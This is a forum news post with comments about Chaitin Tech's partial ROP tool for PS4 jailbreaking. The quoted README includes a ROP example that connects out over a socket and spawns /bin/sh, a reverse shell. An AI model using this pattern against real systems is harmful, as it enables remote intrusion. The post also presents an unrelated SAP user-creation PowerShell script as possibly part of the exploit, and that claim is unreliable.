Category PS4 Jailbreaking       Thread starter PSXHAX       Start date Oct 27, 2016 at 11:35 PM       10,290       12            
Following recent research from PlayStation 4 developers into the 4.01 PS4 Jailbreak by Chaitin Tech, today the Chinese PS4 Jailbreaking Team have released an ROP (Return Oriented Programming) tool on their Pro GIT to aid developers in exploiting the PlayStation 4.

Download: pro-master.zip / GIT

PSXHAX Moderator @Centrino points out the GIT work is incomplete, referencing line 41 meaning it only contains partial information and nothing can be done with it by end-users just yet.

In other words, although Chaitin Tech are not teasing, they also are not spoon feeding (giving away their full exploit).

Here is a snippet from #ps4dev on iRC via @Fimo for those interested:

[rck`d] the nonsecure browser has no jit, only the secure browser now (used for PSN store, etc) has JIT
[rck`d] Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process

:sneaky: Everyone can draw their own conclusions, but thus far it wouldn't surprise me if the Chinese Team is just a 'smoke and mirrors' scheme as dongle douchbags start re-DRMing the exploit to profit off PS4 sceners... then when people whine they'll direct them to this GIT of incomplete code as a 'free' alternative to their useless 'product' but hopefully I'm mistaken. :whistle:

Anyhow, to quote from the README.md: PRO: PROgramming ROP like a PRO

This is a crappy tool used in our private PS4 jailbreak. Since some version, the internal browser is compiled WITHOUT jit support, and sys_jitshm_xxx seems to be disabled for unprivileged process. We have to write the kernel exploitation in ROP, like what has been done in HENKaku jailbreak.

Build
Code:
pip install git+https://github.com/chaitin/pro
If you have modified the pro.g4 file, use the following commands to generate new lexer and parser.
Code:
cd pro/parse && antlr4 -no-listener -visitor -Dlanguage=Python2 pro.g4
Examples
Code:
toy {
    {% include "gadgets.pro" %}
    {% include "glibc.pro" %}
    const AF_INET(2);
    const SOCK_STREAM(1);
    const IPPROTO_IP(0);
    var fd;
    socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    func store_rdx_rax<libc, 0x0002e60c, "rdx,rax::">;
    store_rdx_rax(&fd, undefined);
    printf("socket fd = %d\n", fd);
    array addr["\x02\x00\x41\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"];
    connect(fd, addr, 0x10);
    {% for i in range(3): %}
        dup2(fd, {{i}});
    {% endfor %}
    system("/bin/sh");
    exit(1);
}
Usage

A BIG TODO. Just try and learn by yourself.

Quick Guide

All expressions should be evaluated during compilation, Const/Func should be initialized in declaration.

Func is initialized with . Base/Offset is used for relocation, Signature determines the calling convention of Func.

Array can be declared with size(Int) or directly initialized with its content(String).

For loop should be written in template script, it will be rendered before compilation. For more information, check Jinja2.

From Pastebin.com on what may be part of the Chaitin PS4 exploit used:
Code:
# スクリプト実行パスを取得する関数
# バージョンによって取得する情報を変更する
function Get-ScriptDir() {
    if( $PSVersionTable.PSVersion.Major -ge 3) {
        # Data from $PSScriptRoot
        $ScriptDir = $PSScriptRoot
    }
    else {
        # Data from $MyInvocation.MyCommand.Path
        $ScriptDir = Split-Path $MyInvocation.MyCommand.Path -Parent
    }
    return $ScriptDir
}


# NetWeaver .Net Connectorのモジュールをロードする関数
function Load-Nco {
    $ScriptDir = Get-ScriptDir

    $Size = [System.IntPtr]::Size
    if ($Size -eq 4) {
        $Path = $ScriptDir + "\x86\"
    }
    elseif ($Size -eq 8) {
        $Path = $ScriptDir + "\x64\"
    }

    [Reflection.Assembly]::LoadFile($Path + "sapnco.dll") > $Null
    [Reflection.Assembly]::LoadFile($Path + "sapnco_utils.dll") > $Null
}

# -----
# SAPへの接続先を設定する
# -----
Function Get-Destination {
    $cfgParams = New-Object SAP.Middleware.Connector.RfcConfigParameters
    $cfgParams.Add("NAME", "TEST")
    $cfgParams.Add("ASHOST", "ABAP")
    $cfgParams.Add("SYSNR", "00")
    $cfgParams.Add("CLIENT", "400")
    $cfgParams.Add("USER", "User")

    $secPasswd = Read-Host -Prompt "Password" -AsSecureString
    $ptrPasswd = [Runtime.InteropServices.Marshal]::SecureStringToBStr($secPasswd)
    $passwd = [Runtime.InteropServices.Marshal]::PtrToStringBStr($ptrPasswd)
    $cfgParams.Add("PASSWD", $passwd)

    $cfgParams.Add
    Return [SAP.Middleware.Connector.RfcDestinationManager]::GetDestination($cfgParams)
}

# ----
# SAP汎用モジュールを実行する
# ----
Function Invoke-SAPFunctionModule {
    $destination = Get-Destination

    # Metadata
    Try {
        [SAP.Middleware.Connector.IRfcFunction]$bapiCreateUser = $destination.Repository.CreateFunction("BAPI_USER_CREATE1")
        [SAP.Middleware.Connector.IRfcFunction]$bapiTransactionCommit = $destination.Repository.CreateFunction("BAPI_TRANSACTION_COMMIT")
    }
    Catch [SAP.Middleware.Connector.RfcBaseException] {
        Write-Host "Failed"
        Break
    }

    # Set Import Parameters
    $bapiCreateUser.SetValue("USERNAME", "MYUSER")
    [SAP.Middleware.Connector.IRfcStructure]$imPassword = $bapiCreateUser.GetStructure("PASSWORD")
    $imPassword.SetValue("BAPIPWD", "initial")
    [SAP.Middleware.Connector.IRfcStructure]$imAddress = $bapiCreateUser.GetStructure("ADDRESS")
    $imAddress.SetValue("FIRSTNAME", "My")
    $imAddress.SetValue("LASTNAME", "User")
    $imAddress.SetValue("FULLNAME", "MyUser")

    # Open context
    [SAP.Middleware.Connector.RfcSessionManager]::BeginContext($destination) > $Null

    # 汎用モジュール呼び出し
    Try {
        # ユーザ作成
        $bapiCreateUser.Invoke($destination)
        [SAP.Middleware.Connector.IRfcTable]$return = $bapiCreateUser.GetTable("RETURN")
        ForEach ($line in $return) {
            Write-Host $line.GetValue("TYPE") "-" $line.GetValue("MESSAGE")
        }
        # コミット
            $bapiTransactionCommit.Invoke($destination)
        }
    Finally {
        # クローズ
        [SAP.Middleware.Connector.RfcSessionManager]::EndContext($destination) > $Null
    }
}


# ----
# メイン関数
# ----
Function Main() {
    Load-NCo
    Invoke-SAPFunctionModule
}


# ------------------------------
# Main
# ------------------------------

Main
Thanks to @spyro2670 in the Shoutbox and @simobuoncuo for the tip!
Chaitin Tech PS4 Jailbreak ROP Tool.jpg
 

Comments

PSXHAX

Staff Member
Moderator
Contributor
Verified
But dont saying other devs they've got the xploit a few months back?
Rebug's @evilsperm said this a few days back which hints at it:

Scene groups like TRSi also made vague hints on PS4 game decryption in their NFOs but nothing specific about having an exploit themselves.

Unless all they care about is quick cash... if the 'Chinese Team' really exist and this isn't just a charade by dongle makers they would be foolish to settle for dongle money when they could start their own online crowdfunding / kickstarter page and let everyone globally contribute but we'll see what direction it goes in next. ;)
 

mcmrc1

Senior Member
Contributor
Verified
I dont think they are dongle makers... They have also added support for 3.55 and 4.01 linux on the fail0verflow git. But same @failoverflow without an ksploit.

But if one gets released you can use it directly to load linux :)
 

PLAYER 1

Senior Member
Contributor
Remember the dongles/ODEs, after a while some chinese manufacturers made them based on an old discover that nobody used before because of the money required to build the soft and/or hard to make it real and useful.

So, if the ps4 backdoor is software based, chinese are not interested, but if it involve a dongle/chip/flasher/dildo... they can design it, build it and sell it in a minute. Money rules, boys, if some hardware is needed, it cost money and they will sell it well, wat do you spect ??

We can just pray we could pay for it at least or wait for the devs do a big move. Nothing is free this days, everyone involved (devs or factorys) are wasting time and money to do whatever they can.

Too many unclear things around this "ps4 scene", i dont like it.
 

mcmrc1

Senior Member
Contributor
Verified
@PLAYER 1 Also i think if some Dongle will pop up our devs will instantly pwn the device and give it to us 4 free :)
The most from them are also hating reDRM devices :)

There is also good Hardware like the E3 flasher but they also let it look bad because with their fw you can only use it on one ps3 ^^ Idiots...
 
Recent Articles
PS4 Patch Builder for Building Modded Update PKGs by MODDED WARFARE
Since his YouTube Issues PlayStation 4 homebrew developer @MODDEDWARFARE returns releasing on Twitter a PS4 Patch Builder application used for building modded Update Packages (PKGs) alongside a...
PS Vita System Software / Firmware 3.73 is Live, Don't Update!
Trick or treat?! 🎃 Since their previous PS Vita OFW revision, today Sony pushed live a PlayStation Vita System Software / Firmware 3.73 Update leaving many curious if they patched the H-Encore 2...
PlayStation Store Halloween Sale Now Live, PSN Game Deals Up to Half Off
The month is already half over and Halloween 2019 is quickly approaching as Sony unleashes their latest PlayStation Store Halloween Sale featuring PSN game deals at up to 50% off on select titles...
Sony PlayStation Augmented Reality (AR) Wireless Headset Patent Surfaces
Contrary to the potential PSVR2 Patent that superimposes a computer-generated image on a user's view of the real world, the latest PlayStation Augmented Reality (AR) Wireless Headset Patent by...
Top